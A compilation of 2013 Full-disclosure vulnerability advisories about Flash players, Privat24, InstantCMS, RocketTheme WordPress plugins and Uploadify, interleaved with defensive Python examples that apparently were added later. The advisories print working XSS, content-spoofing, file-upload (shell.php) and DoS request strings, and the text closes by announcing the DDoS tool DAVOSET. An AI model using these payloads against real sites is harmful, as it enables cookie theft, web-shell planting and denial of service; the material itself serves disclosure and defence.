Hello list!

These are Cross-Site Scripting and Content Spoofing vulnerabilities in mp3-player.

- Affected products: -

Vulnerable are mp3-player 2.5 and previous versions.

- Affected vendors: -

U-Studio
http://flv-mp3.com

-- Details: --

XSS (via Flash Injection) (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=xss.swf

In old versions of Flash player the attack will work with the flash file xss.swf at any domain, in new versions - only at the same domain.

Content Spoofing (Flash Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=http://site2/1.swf

Content Spoofing (Content Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3

Content Spoofing (HTML Injection) (WASC-12):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E

XSS (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=+%3Cimg%20src=%27xss.swf%27%3E

In old versions of Flash player the attack will work with the flash file xss.swf at any domain, in new versions - only at the same domain.

XSS (Strictly social XSS) (WASC-08):

http://site/path/ump3player_500x70.swf?way=http://site2&comment=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Timeline:

2013.08.06 - informed developers.
2013.08.12 - announced at my site.
2013.10.11 - disclosed at my site (http://websecurity.com.ua/6698/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Multiple vulnerabilities in flv-player
Hello list!

These are Cross-Site Scripting and Content Spoofing vulnerabilities in flv-player.

- Affected products: -

Vulnerable are flv-player 3.5 and previous versions.

- Affected vendors: -

U-Studio
http://flv-mp3.com

-- Details: --

XSS (via Flash Injection) (WASC-08):

http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&skin=xss.swf

In old versions of Flash player the attack will work with the flash file xss.swf at any domain, in new versions - only at the same domain.

Content Spoofing (Flash Injection) (WASC-12):

http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&skin=http://site2/1.swf

Content Spoofing (Content Injection) (WASC-12):

http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv
http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&pic=http://site2/1.jpg

Content Spoofing (HTML Injection) (WASC-12):

http://site/path/uflvplayer_500x375.swf?way=http://site&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E

XSS (WASC-08):

http://site/path/uflvplayer_500x375.swf?way=http://site&comment=+%3Cimg%20src=%27xss.swf%27%3E

In old versions of Flash player the attack will work with the flash file xss.swf at any domain, in new versions - only at the same domain.

Also a Strictly social XSS attack is possible.

Timeline:

2013.08.03 - announced at my site.
2013.08.05 - informed developers.
2013.10.08 - disclosed at my site (http://websecurity.com.ua/6694/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Vulnerability in Privat24 for Android and iOS
Hello list!

This is an Insufficient Process Validation vulnerability in Privat24, which allows bypassing the OTP (sent via SMS) and stealing money from users' accounts. Privat24 is the Internet banking of PrivatBank. All mobile clients are vulnerable, unlike the web site of Privat24. Since 06.06.2013, when I found the hole and informed PrivatBank, they still haven't fixed it.

Affected products:

Vulnerable are all versions (because the hole depends on server configuration). Tested in Privat24 3.27.2 for Android and Privat24 4.8.6 for iOS. The version for Windows Phone must be affected as well.

Affected vendors:

PrivatBank
Privat24 for iOS
https://itunes.apple.com/ru/app/privat24/id326277589?mt=8
Privat24 for Android
https://play.google.com/store/apps/details?id=ua.privatbank.ap24
https://play.google.com/store/apps/details?id=ua.privatbank.ap24old
Privat24 for Windows Phone
http://www.windowsphone.com/ru-ru/store/app/privat24/134e3c22-dab5-4305-906b-78ec850bfe32

Details:

Insufficient Process Validation (WASC-40):

When logging into Privat24 via the clients for Android and iOS, the OTP is not asked for (as it was before June 2013). I.e. it is possible to log into the account without confirming with the one-time password which comes by SMS - unlike the web site of Privat24, where the OTP is always asked for.

The only time an SMS with an OTP comes is on a new device, to lock it to the account. After that there is no more OTP. This can be bypassed by accessing the victim's phone or tablet, or by using the first hole of those which I found in Privat24 earlier. To steal money from the account while bypassing the OTP for the transaction (as on the web site of Privat24), the second hole of those which I found in Privat24 earlier can be used. Both of these vulnerabilities will be disclosed soon.

Watch the demonstration video of the vulnerability in Privat24:
http://www.youtube.com/watch?v=d1ifN8MPZQo

Timeline:

2013.03.14 - found two vulnerabilities in Privat24 for Android.
2013.03.15 - informed PrivatBank. Ignored.
2013.06.06 - found a new vulnerability (described in this advisory) in Privat24 for Android (later tested in iOS).
2013.06.06 - informed PrivatBank. Answered that they were aware of it and were working to fix it.
2013.06.06 - announced at my site.
2013.06 - 2013.09 - multiple times reminded PrivatBank about this hole and gave arguments about the previous two holes.
2013.09.13 - disclosed at my site (http://websecurity.com.ua/6554/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
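The flaw in the advisory above is that the server completes a login, and then a transfer, for a client that never went through the OTP step. The Python sketch below is an added illustration of server-side process validation and is not PrivatBank's code; the backend, the session object, the balances and the SMS outbox are all constructed for the example. The point it shows is that every mandatory step is checked by the server against its own record of what the session has confirmed, so a client that skips the login OTP, or the per-transaction OTP, is refused no matter which app it is.

```python
import hmac
import secrets
from dataclasses import dataclass, field


class ProcessViolation(Exception):
    """A client tried to perform a step whose prerequisite step was skipped."""


@dataclass
class Session:
    user: str
    device_id: str
    password_ok: bool = False
    pending: dict = field(default_factory=dict)    # purpose -> OTP code awaiting confirmation
    confirmed: set = field(default_factory=set)    # purposes confirmed by OTP
    drafts: dict = field(default_factory=dict)     # tx_id -> (amount, destination)


class BankingCore:
    """Hypothetical server side of the flow, constructed for this example."""

    def __init__(self):
        self.balances = {"alice": 1000}
        self.sms_outbox = []   # stand-in for the SMS gateway

    def _issue_otp(self, session, purpose):
        code = f"{secrets.randbelow(10**6):06d}"
        session.pending[purpose] = code
        self.sms_outbox.append((session.user, purpose, code))
        return code   # returned only so the example can drive the flow offline

    def _require(self, session, purpose):
        # The server, not the client, decides whether a step has been completed.
        if not session.password_ok or purpose not in session.confirmed:
            raise ProcessViolation(f"step '{purpose}' was not confirmed")

    def login(self, session, password_ok):
        if not password_ok:
            raise PermissionError("bad credentials")
        session.password_ok = True
        # OTP on every login for every client type; device binding is an extra
        # signal, never a replacement for this step.
        return self._issue_otp(session, "login")

    def confirm_otp(self, session, purpose, code):
        expected = session.pending.pop(purpose, None)
        if expected is None or not hmac.compare_digest(expected, code):
            raise PermissionError("OTP mismatch")
        session.confirmed.add(purpose)

    def begin_transfer(self, session, tx_id, amount, destination):
        self._require(session, "login")
        session.drafts[tx_id] = (amount, destination)
        # A second OTP is bound to this exact transaction id.
        return self._issue_otp(session, f"transfer:{tx_id}")

    def commit_transfer(self, session, tx_id):
        self._require(session, "login")
        self._require(session, f"transfer:{tx_id}")
        session.confirmed.discard(f"transfer:{tx_id}")   # one confirmation, one commit
        amount, destination = session.drafts.pop(tx_id)
        if self.balances[session.user] < amount:
            raise ValueError("insufficient funds")
        self.balances[session.user] -= amount
        self.balances[destination] = self.balances.get(destination, 0) + amount
        return self.balances[session.user]


def attempt(fn, *args):
    """Run a step and report which exception class stopped it, or None."""
    try:
        fn(*args)
        return None
    except Exception as exc:
        return type(exc).__name__


def run_flows():
    """A client that skips the OTP steps versus one that performs them."""
    core = BankingCore()
    skipper = Session("alice", "phone-1")
    core.login(skipper, True)
    skipped = attempt(core.begin_transfer, skipper, "t1", 100, "bob")  # login OTP never confirmed

    honest = Session("alice", "phone-1")
    code = core.login(honest, True)
    core.confirm_otp(honest, "login", code)
    tx_code = core.begin_transfer(honest, "t2", 100, "bob")
    early = attempt(core.commit_transfer, honest, "t2")   # transfer OTP not yet confirmed
    core.confirm_otp(honest, "transfer:t2", tx_code)
    remaining = core.commit_transfer(honest, "t2")
    replay = attempt(core.commit_transfer, honest, "t2")  # reusing the confirmation fails
    return {"skipped": skipped, "early": early, "remaining": remaining, "replay": replay}
```

The two flows in run_flows() are the whole lesson: the skipping client gets ProcessViolation at the first sensitive step, the honest client ends with a balance of 900, and a second commit against the same confirmation is refused because the confirmation is consumed.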
[Full-disclosure] Multiple vulnerabilities in InstantCMS
Hello 3APA3A!

These are Login Enumeration, Cross-Site Scripting and Content Spoofing vulnerabilities in InstantCMS.

Affected products:

Vulnerable are InstantCMS 1.10.2 and previous versions.

Affected vendors:

InstantSoft
http://www.instantcms.ru

Details:

Login Enumeration (WASC-42):
http://site/users/login

It's possible to reveal logins via users' profiles. Also the logins of the users are shown in many sections of the site (on the users page and others), because the developers don't care about leakage of the users' logins. In the next advisory about InstantCMS I'll give more examples of such vulnerabilities.

Cross-Site Scripting (WASC-08):
http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Content Spoofing (WASC-12):
http://site/includes/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
http://site/includes/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif

Timeline:

In November 2012 and March 2013 I disclosed and wrote to the lists about vulnerabilities in SWFUpload. Everyone who wanted to fixed these holes, but not the developers of InstantCMS.
2013.07.14 - found multiple vulnerabilities in InstantCMS 1.10.1.
2013.07.19 - informed developers about the first part of the vulnerabilities. Ignored.
2013.07.30 - announced at my site.
2013.07.31 - informed developers about another part of the vulnerabilities. Answered, but refused to fix.
2013.08.02 - reminded developers about the first letter with holes and explained why to fix them.
2013.08.02 - developers released InstantCMS 1.10.2 without fixing any of the reported vulnerabilities. All above-mentioned holes work in it.
2013.09.24 - disclosed at my site (http://websecurity.com.ua/6681/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Multiple vulnerabilities in RokMicroNews for WordPress
Hello list!

I want to warn you about multiple vulnerabilities in the plugin RokMicroNews for WordPress.

In August 2012 I wrote about multiple vulnerabilities in RokBox for WordPress (http://securityvulns.ru/docs28871.html). These vulnerabilities are similar, since the same developers put the same vulnerable TimThumb into another of their plugins (whose vulnerabilities I already disclosed in 2011). These are Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities.

In July 2013 the developers released a patch for their plugins and themes with TimThumb (http://www.rockettheme.com/wordpress-updates/1871-security-patch-for-wordpress-timthumb), which can be used to fix these vulnerabilities (except the last FPD).

Affected products:

Vulnerable are RokMicroNews 1.5 and previous versions (to attacks on TimThumb; all versions are vulnerable to FPD). Besides the standalone WP plugin, this web application comes as part of the themes. Many of the 56 RocketTheme WP themes (http://www.rockettheme.com/wordpress-themes) use RokMicroNews, and old versions of these themes are vulnerable to attacks on TimThumb (and all versions of them are vulnerable to FPD).

Affected vendors:

RocketTheme
http://www.rockettheme.com

Details:

XSS (WASC-08):
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site/page.png&h=1&w=111
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site/page.png&h=111&w=1

Abuse of Functionality (WASC-42):
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site.flickr.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)

DoS (WASC-10):
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)

You can read about such Abuse of Functionality and Denial of Service vulnerabilities in my article "Using of the sites for attacks on other sites" (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). For such attacks my tool DAVOSET (http://websecurity.com.ua/davoset/) can be used.

Arbitrary File Upload (WASC-31):
http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://flickr.com.site.com/shell.php

This Arbitrary File Upload vulnerability in TimThumb was disclosed 3.5 months after my disclosure of the previous holes.

Full path disclosure (WASC-13):
http://site/wp-content/plugins/wp_rokmicronews/rokmicronews.php

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Multiple vulnerabilities in RokIntroScroller for WordPress
Hello list!

I want to warn you about multiple vulnerabilities in the plugin RokIntroScroller for WordPress.

In August 2012 I wrote about multiple vulnerabilities in RokBox for WordPress (http://securityvulns.ru/docs28871.html). These vulnerabilities are similar, since the same developers put the same vulnerable TimThumb into another of their plugins (whose vulnerabilities I already disclosed in 2011). These are Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities.

In July 2013 the developers released a patch for their plugins and themes with TimThumb (http://www.rockettheme.com/wordpress-updates/1871-security-patch-for-wordpress-timthumb), which can be used to fix these vulnerabilities (except the last FPD).

Affected products:

Vulnerable are RokIntroScroller 1.8 and previous versions (to attacks on TimThumb; all versions are vulnerable to FPD). Besides the standalone WP plugin, this web application comes as part of the themes. Many of the 56 RocketTheme WP themes (http://www.rockettheme.com/wordpress-themes) use RokIntroScroller, and old versions of these themes are vulnerable to attacks on TimThumb (and all versions of them are vulnerable to FPD).

Affected vendors:

RocketTheme
http://www.rockettheme.com

Details:

XSS (WASC-08):
http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):
http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://
http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site/page.png&h=1&w=111
http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site/page.png&h=111&w=1

Abuse of Functionality (WASC-42):
http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site.flickr.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)

DoS (WASC-10):
http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)

You can read about such Abuse of Functionality and Denial of Service vulnerabilities in my article "Using of the sites for attacks on other sites" (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). For such attacks my tool DAVOSET (http://websecurity.com.ua/davoset/) can be used.

Arbitrary File Upload (WASC-31):
http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://flickr.com.site.com/shell.php

This Arbitrary File Upload vulnerability in TimThumb was disclosed 3.5 months after my disclosure of the previous holes.

Full path disclosure (WASC-13):
http://site/wp-content/plugins/wp_rokintroscroller/rokintroscroller.php

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] XSS and Redirector vulnerabilities in InstantCMS
Hello list!

These are Cross-Site Scripting and Redirector vulnerabilities in InstantCMS.

Affected products:

Vulnerable are InstantCMS 1.10.2 and previous versions.

Affected vendors:

InstantSoft
http://www.instantcms.ru

Details:

Cross-Site Scripting (WASC-08):

GET request to http://site/modules/mod_template/set.php with the Referer header set:

Referer: data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Redirector (URL Redirector Abuse) (WASC-38):

GET request to http://site/modules/mod_template/set.php with the Referer header set:

Referer: http://websecurity.com.ua

Timeline:

2013.07.14 - found multiple vulnerabilities in InstantCMS 1.10.1.
2013.07.17 - announced at my site.
2013.07.19 - informed developers about the first part of the vulnerabilities. Ignored.
2013.07.31 - informed developers about another part of the vulnerabilities. Answered, but refused to fix.
2013.08.02 - reminded developers about the first letter with holes and explained why to fix them.
2013.08.02 - developers released InstantCMS 1.10.2 without fixing any of the reported vulnerabilities. Both above-mentioned holes work in it.
2013.09.17 - disclosed at my site (http://websecurity.com.ua/6661/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
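Both holes above have the same cause: set.php sends the browser back to whatever the Referer header says, so a data: URL becomes script execution and an external URL becomes an open redirect. The Python below is an added example, not part of the advisory and not InstantCMS code, of how a "go back where you came from" endpoint can keep that behaviour while refusing anything that does not stay on its own origin. It goes a little beyond the two Referer values in the advisory: data: and javascript: schemes, other hosts, user@host forms and protocol-relative //host values all fall back to a local default. The hostname "site", the handler name and the fallback path are assumptions for the example.

```python
from urllib.parse import urlsplit


def safe_redirect_target(candidate, own_host, fallback="/"):
    """Return candidate only when it stays on our own site; otherwise fallback."""
    if not candidate:
        return fallback
    # Control characters would let the value break the Location header; browsers
    # treat backslashes as slashes, so "/\\evil" would turn protocol-relative.
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in candidate) or "\\" in candidate:
        return fallback
    parts = urlsplit(candidate)
    if parts.scheme == "" and parts.netloc == "":
        # A relative path on our own origin. "//host" parses with a netloc,
        # so a protocol-relative URL never reaches this branch.
        return candidate if candidate.startswith("/") else fallback
    if parts.scheme.lower() in ("http", "https") and (parts.hostname or "").lower() == own_host.lower():
        # Comparing parts.hostname, not the raw string, defeats "http://site@evil/".
        return candidate
    # data:, javascript:, other hosts and protocol-relative URLs are all refused.
    return fallback


def redirect_after_template_change(headers, own_host):
    """Hypothetical 'set template, then return to the previous page' handler.
    Returns the Location value the server should send."""
    referer = headers.get("Referer", "")
    return safe_redirect_target(referer, own_host)
```

The two Referer values from the advisory both resolve to the fallback, while a same-site Referer is preserved; a site that keeps the redirect-to-Referer convenience at all should do so only through a check of this shape, never by echoing the header.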
[Full-disclosure] Multiple vulnerabilities in RokNewsPager for WordPress
Hello list!

I want to warn you about multiple vulnerabilities in the plugin RokNewsPager for WordPress.

In August 2012 I wrote about multiple vulnerabilities in RokBox for WordPress (http://securityvulns.ru/docs28871.html). These vulnerabilities are similar, since the same developers put the same vulnerable TimThumb into another of their plugins (whose vulnerabilities I already disclosed in 2011). These are Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities.

In July 2013 the developers released a patch for their plugins and themes with TimThumb (http://www.rockettheme.com/wordpress-updates/1871-security-patch-for-wordpress-timthumb), which can be used to fix these vulnerabilities (except the last FPD).

Affected products:

Vulnerable are RokNewsPager 1.17 and previous versions (to attacks on TimThumb; all versions are vulnerable to FPD). Besides the standalone WP plugin, this web application comes as part of the themes. Many of the 56 RocketTheme WP themes (http://www.rockettheme.com/wordpress-themes) use RokStories, and old versions of these themes are vulnerable to attacks on TimThumb (and all versions of them are vulnerable to FPD).

Affected vendors:

RocketTheme
http://www.rockettheme.com

Details:

XSS (WASC-08):
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://site/page.png&h=1&w=111
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://site/page.png&h=111&w=1

Abuse of Functionality (WASC-42):
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://site.flickr.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)

DoS (WASC-10):
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)

You can read about such Abuse of Functionality and Denial of Service vulnerabilities in my article "Using of the sites for attacks on other sites" (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). For such attacks my tool DAVOSET (http://websecurity.com.ua/davoset/) can be used.

Arbitrary File Upload (WASC-31):
http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://flickr.com.site.com/shell.php

This Arbitrary File Upload vulnerability in TimThumb was disclosed 3.5 months after my disclosure of the previous holes.

Full path disclosure (WASC-13):
http://site/wp-content/plugins/wp_roknewspager/roknewspager.php

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Multiple vulnerabilities in RokStories for WordPress
Hello list!

I want to warn you about multiple vulnerabilities in the plugin RokStories for WordPress.

In August 2012 I wrote about multiple vulnerabilities in RokBox for WordPress (http://securityvulns.ru/docs28871.html). These vulnerabilities are similar, since the same developers put the same vulnerable TimThumb into another of their plugins (whose vulnerabilities I already disclosed in 2011). These are Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities.

In July 2013 the developers released a patch for their plugins and themes with TimThumb (http://www.rockettheme.com/wordpress-updates/1871-security-patch-for-wordpress-timthumb), which can be used to fix these vulnerabilities (except the last FPD).

Affected products:

Vulnerable are RokStories 1.25 and previous versions (to attacks on TimThumb; all versions are vulnerable to FPD). Besides the standalone WP plugin, this web application comes as part of the themes. Many of the 56 RocketTheme WP themes (http://www.rockettheme.com/wordpress-themes) use RokStories, and old versions of these themes are vulnerable to attacks on TimThumb (and all versions of them are vulnerable to FPD).

Affected vendors:

RocketTheme
http://www.rockettheme.com

Details:

XSS (WASC-08):
http://site/wp-content/plugins/wp_rokstories/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):
http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://
http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://site/page.png&h=1&w=111
http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://site/page.png&h=111&w=1

Abuse of Functionality (WASC-42):
http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://site.flickr.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)

DoS (WASC-10):
http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)

You can read about such Abuse of Functionality and Denial of Service vulnerabilities in my article "Using of the sites for attacks on other sites" (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). For such attacks my tool DAVOSET (http://websecurity.com.ua/davoset/) can be used.

Arbitrary File Upload (WASC-31):
http://site/wp-content/plugins/wp_rokstories/thumb.php?src=http://flickr.com.site.com/shell.php

This Arbitrary File Upload vulnerability in TimThumb was disclosed last year, 3.5 months after my disclosure of the previous holes.

Full path disclosure (WASC-13):
http://site/wp-content/plugins/wp_rokstories/rokstories.php

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
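The four RocketTheme advisories above (RokMicroNews, RokIntroScroller, RokNewsPager and RokStories) all note a "bypass of restriction on domain" with hosts such as flickr.com.site.com. That is the signature of an allowlist applied as a substring of the host string rather than as a comparison of host labels. The Python below is an added example, not TimThumb's, RocketTheme's or the advisories' code, with a constructed allowlist and a constructed size cap; it puts the weak check beside a label-wise one that also rejects non-http schemes and user@host forms, and adds the streaming size cap that the big_file DoS variant calls for in any component that fetches remote images.

```python
import io
from urllib.parse import urlsplit

# Constructed allowlist of image hosts; the names are placeholders for the example.
ALLOWED_DOMAINS = ("flickr.com", "staticflickr.com")
MAX_REMOTE_BYTES = 2 * 1024 * 1024   # constructed cap on a fetched image body


def host_allowed_substring(url, allowed=ALLOWED_DOMAINS):
    """The weak pattern: accept if an allowed name occurs anywhere in the
    network location. Any host containing the name passes."""
    netloc = urlsplit(url).netloc.lower()
    return any(name in netloc for name in allowed)


def host_allowed_strict(url, allowed=ALLOWED_DOMAINS):
    """Accept only http(s) URLs whose parsed hostname is exactly an allowed
    name or a label-wise subdomain of one."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False                      # "flickr.com@site" smuggles the name into userinfo
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    return any(host == name or host.endswith("." + name) for name in allowed)


def classify(url):
    """(weak verdict, strict verdict) for a candidate remote URL."""
    return host_allowed_substring(url), host_allowed_strict(url)


def read_capped(stream, limit=MAX_REMOTE_BYTES, chunk=64 * 1024):
    """Read a response body without trusting Content-Length; abort past the cap."""
    buf = bytearray()
    while True:
        piece = stream.read(chunk)
        if not piece:
            return bytes(buf)
        buf += piece
        if len(buf) > limit:
            raise ValueError("remote body exceeds cap")


def body_within_cap(data, limit=MAX_REMOTE_BYTES):
    """True if a body of these bytes would be accepted by read_capped."""
    try:
        read_capped(io.BytesIO(data), limit)
        return True
    except ValueError:
        return False
```

One caveat the strict check makes visible: it still accepts genuine subdomains of an allowed name, so an allowlist entry only helps when nobody hostile can obtain a subdomain under it. When that is not certain, list the specific hosts the application actually needs rather than an apex domain, and cap the fetch size regardless of which host passed.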
[Full-disclosure] AFU, AFD and XSS vulnerabilities in Uploadify
Hello list!

These are Arbitrary File Uploading, Arbitrary File Deletion and Cross-Site Scripting vulnerabilities in Uploadify. Particularly in the version used in aCMS (it looks like these developers use a modified version of Uploadify, but other developers can also use such a version).

Affected products:

Vulnerable are Uploadify v2.1.4 and potentially other versions. Particularly the version in aCMS. Uploadify 3.x versions are not vulnerable.

Details:

Arbitrary File Uploading (WASC-31):
http://websecurity.com.ua/uploads/2013/Uploadify%20AFU.html
<form action="http://site/uploadify.php" method="post" enctype="multipart/form-data">

Arbitrary File Deletion (WASC-42):
http://websecurity.com.ua/uploads/2013/Uploadify%20AFD.html
<form action="http://site/uploadify.php" method="post" enctype="multipart/form-data">

Cross-Site Scripting (WASC-08):
http://websecurity.com.ua/uploads/2013/Uploadify%20XSS.html
<form action="http://site/uploadify.php" method="post" enctype="multipart/form-data">
http://websecurity.com.ua/uploads/2013/Uploadify%20XSS-2.html
<form action="http://site/uploadify.php" method="post" enctype="multipart/form-data">

The second attack can be done on Linux/Unix systems, where angle brackets can be used in file names, or by spoofing the headers. With the following headers (to specify the XSS payload in the extension):

POST http://site/uploadify.php
-240841995418756\r\n
Content-Disposition: form-data; name="Filedata"; filename="test.onload=with(document)alert(cookie)>"\r\n
Content-Type: application/octet-stream\r\n
\r\n
test\r\n
\r\n
-240841995418756\r\n
Content-Disposition: form-data; name="folder"\r\n
\r\n
/uploadify\r\n
-240841995418756--\r\n

Timeline:

2013.03.04 - informed developers of aCMS about part of the vulnerabilities.
2013.04.03 - informed developers of aCMS about another part of the vulnerabilities.
2013.04.07 - informed developers of aCMS about another part of the vulnerabilities.
2013.05.25 - informed developers of aCMS about another part of the vulnerabilities.
2013.05.26 - informed developers of aCMS about another part of the vulnerabilities. In all cases the developers just ignored all messages via different e-mails and the contact form.
2013.06.12 - announced at my site.
2013.06.22 - informed developers of Uploadify.
2013.09.12 - disclosed at my site (http://websecurity.com.ua/6566/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
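The AFU, AFD and XSS holes in the advisory above share one root: uploadify.php trusts the filename and folder the client sends in the multipart body. The Python below is an added example and is not Uploadify's or aCMS's code; the upload root, the extension policy and the name-length limit are constructed for the example. It shows the server-side handling a defender would want for both the upload and the delete action: the filename is reduced to a safe character set and an extension allowlist (so the filename with the onload= payload from the advisory and a shell.php are both refused, and double extensions are neutralised), and the folder parameter is confined under a fixed root so "../" cannot escape it in either direction.

```python
import os
import posixpath
import re

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}   # constructed policy for an image uploader
UPLOAD_ROOT = "/var/www/uploads"                     # hypothetical storage root
UNSAFE = re.compile(r"[^A-Za-z0-9._-]")


def sanitize_filename(client_name):
    """Return a safe server-side name, or None if the upload must be refused."""
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1]   # drop any path the client sent
    base = UNSAFE.sub("_", base).strip("._")                    # no < > ' " = or spaces, no leading dots
    if not base:
        return None
    stem, ext = os.path.splitext(base)
    ext = ext.lstrip(".").lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None                        # the advisory's "test.onload=..." name dies here
    stem = stem.replace(".", "_")          # "shell.php.png" -> "shell_php.png": no double extensions
    return f"{stem[:80]}.{ext}"


def resolve_upload_dir(folder, root=UPLOAD_ROOT):
    """Confine the client-supplied 'folder' under root; None if it escapes."""
    rel = folder.replace("\\", "/").lstrip("/")
    target = posixpath.normpath(posixpath.join(root, rel))
    if target != root and not target.startswith(root + "/"):
        return None
    return target


def resolve_delete_path(folder, name, root=UPLOAD_ROOT):
    """A delete request may only name a file this code could have created."""
    directory = resolve_upload_dir(folder, root)
    safe = sanitize_filename(name)
    if directory is None or safe is None or safe != name:
        return None
    return posixpath.join(directory, safe)
```

Rejecting rather than "fixing" a bad extension is deliberate: a thumbnail uploader has no reason to accept anything outside its allowlist, and a rewritten name would hide the probe from whoever reads the logs. The delete path applies the identical confinement, which is what the AFD variant lacked.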
[Full-disclosure] DAVOSET v.1.1.3
Hello participants of Mailing List.

After making the public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made the next update of the software. On the 31st of August DAVOSET v.1.1.3 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/).

Download DAVOSET v.1.1.3:
